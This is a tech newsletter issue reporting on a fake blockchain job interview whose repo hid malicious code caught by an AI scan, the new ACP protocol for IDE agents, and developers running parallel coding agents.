LOG IN
← Back to all posts

So Nerdy Planet #11

by Dima Maleev
Oct 20, 2025
Connect

So Nerdy Planet! is a weekly ( at least I am trying ) newsletter about different news that seems to be important.

In this newsletter, we will speak about:

  1. How AI saved from a fake interview
  2. One more protocol for working with AI
  3. Parallel coding agents as a new development style

AI saved an engineer from a hack on a fake interview

No one likes when a test task is a part of the interview process. Worse, it is when your computer can be hacked by doing that test. Yes, it sounds ridiculous—but that’s exactly what happened in this story. David Dodda was 30 seconds away from turning his machine into someone else’s playground after what appeared to be a “legit” coding interview. 

What Went Down
  • A Chief Blockchain Officer on LinkedIn reached out, saying they liked David’s background and wanted a “technical interview” for a blockchain company role. 

  • The company sent a Bitbucket repo, clean-looking code, “just small fixes,” and instructions to install dependencies and run them. Typical dev task, right?

  • But in the repo was hidden what turned out to be malicious code—David recognized the red flags just before he hit “run”. 

  • He asked Cursor if there was some suspicious code in the codebase, and there was.

Before hitting npm start, I threw this prompt at my Cursor AI agent:

"Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it shouldn't be reading, accessing crypto wallets etc."

And holy sh*t.

The attack was sophisticated. LinkedIn profile looked legit, the company profile on LinkedIn looked real, and the approach was very professional. They even used Calendly to schedule a meeting.

Also:

Here's what made this so dangerous:

Urgency: "Complete the test before the meeting to save time."

Authority: LinkedIn verified profile, real company, professional setup.

Familiarity: Standard take-home coding test. Every developer has done dozens of these.

Social Proof: Real company page with real employees and real connections.

I almost fell for it. And I'm paranoid about this stuff.

Based on an investigation from Hacker News, an account is generated and created specifically for scamming people. Symfa as a company seems legit. Funny enough, this account even has a "verified" badge

 

LinkedIn does not help companies verify if people are really working there because anyone can put any company in their profile and write on their behalf. 

It is clear that scammers will target developers who are somehow connected to blockchain development, since it is more likely that they would have crypto-wallets installed on their PC. With automating these attacks with scripts and AI, attacks are happening on a scale, targeting multiple developers at the same time. As with all phishing things - you don't need 100% success - you need one but big. 

The author is providing good tips in case you are running non-verified code on your PC: 

  1. Always sandbox unknown code. Docker containers, VMs, whatever. Never run it on your main machine.

  2. Use AI to scan for suspicious patterns. Takes 30 seconds. Could save your entire digital life.

  3. Verify everything. Real LinkedIn profile doesn't mean real person. Real company doesn't mean real opportunity.

  4. Trust your gut. If someone's rushing you to execute code, that's a red flag.

From my side - well, I am super impressed that AI detected suspicious patterns. Some use cases I never thought about


One more protocol for working with AI

I think every week I can present you a new protocol, which is created to make working with AI generic, easier, more secure, and blah-blah-blah. Seriously, we need to stop this *CP mess. Today, we will speak about ACP - Agentic Client Protocol.

Anyway, as you remember, Antrophic developed its own protocol, called MCP. It kinda changed everything. Now, you can create tools that LLM knows about, and they can be used to get additional information, execute some logic, etc.

Model Context Protocol (MCP) an overview

Why do we need a new protocol? Because now MCP is supported by VS Code, but there are more IDEs around. That is why ACP was created by JetBrains and Zed ( who have their own IDE ) to compete with what is implemented in VS Code. By their words, anyone can use ACP, and it will be able to integrate with all IDEs supporting it with minimal or no work. 

Also, ACP is a protocol created specifically for IDEs ( where MCP was not ), so it has a bit more features like:

  1. Bi-directional communications between AI agents and the IDE
  2. Support for interactive workflows like code generation & inline suggestions

  3. Support for calling local tools within the IDE, including reading files

Also, ACP is supporting MCP, so if you've created anything for MCP, it should work out of the box.

Based on what I can see from the ACP protocol, there should not be much work for VS Code IDEs to switch to this new protocol, and it seems way better in every aspect in comparison to the good-old MCP ( lol, 1 year is old now )


Parallel coding agents as a new development style

A couple of weeks ago, I saw that one of my engineers had a couple of code terminals open, and all of them were doing something different. With Claude Code engineer was discussing the new structure of the project before refactoring, CoPilot was writing tests, and Junie was going through trial period and tried to write at least something ( and he was failing with Scala code )

Anyway, that seems to be a new process for many developers now. Starting from the blog post of Simon Willison and ending with many similar posts ( link 1, link 2)

Surprisingly, this method of development seems to be becoming a new standard, where a couple of terminals with different AIs are doing different jobs, from research on using new libraries, and building prototypes, to planning the development of new features with a checklist of requirements. Most developers who applied this to their daily practice say that they've become way more productive than they were before. 

But all of the engineers who are applying this practice are working on the same pattern:

  1. Defining step-by-step instructions on what will be done based on the requirements provided
  2. Reviewing every part of the code generated at every step
  3. Leaving the most complex part to themselves ( yeah! we are still coding!)

All of the engineers who are succeeding in such a type of development are experienced, and I believe such an approach can be quite dangerous with less experienced engineers.


Community News

We are slowly growing our tools database, and last week we added a template for the Eisenhower Matrix ( by the way, one of the best I've seen :) )

Also, last week we had an invited guest on our bi-weekly meeting, and we've talked with Vlad Kampov, Staff Engineer @ Netflix! 

Responses

Join the conversation
t("newsletters.loading")
Loading...
So Nerdy Planet #10
Hey Nerds! Welcome to issue #10 of this newsletter.  So today we're gonna speak about: New OpenAI and Stripe Integration, and also Agentic Commerce Protocol Ads based on conversation with AI  OpenAI ( again ) and personalized AI New OpenAI and Stripe Integration. ACP There are plenty of predictions of how AI will grow. CloudFlare got ones, NVIDIA has its own, and so on. To cut a long story s...
So Nerdy Planet #9
Hello, My Fellow Nerds!  This is the last newsletter with issues numbered with only one digit :) And actually one of the last with three digits of subscribers :D Thanks for such amazing trust! Before we start - if you'd like to send news, or provide feedback - please feel free to ping me through dima@sonerdy.me  Today we will speak about: NPM ecosystem vulnerability and how it impacts the whol...
So Nerdy Planet #8
Hello, Dear Nerds, This week, everything is about Apple's presentation and how "not innovative" but for some reason "cool" new iPhones. I won't stop on this, since if you are interested, you probably read or watched some reports on this already!  That means that today we will speak about: New report from LeadDev One more nation in the AI race - United Arab Emirates Sam Altman, Tucker Carlson, ...

So Nerdy Planet

Weekly posts about Engineering Management, Technology, and all the Nerdy stuff!
© 2026 So Nerdy!
Powered by Kajabi

GET THE FREE GUIDE

Enter your details below to get this free guide.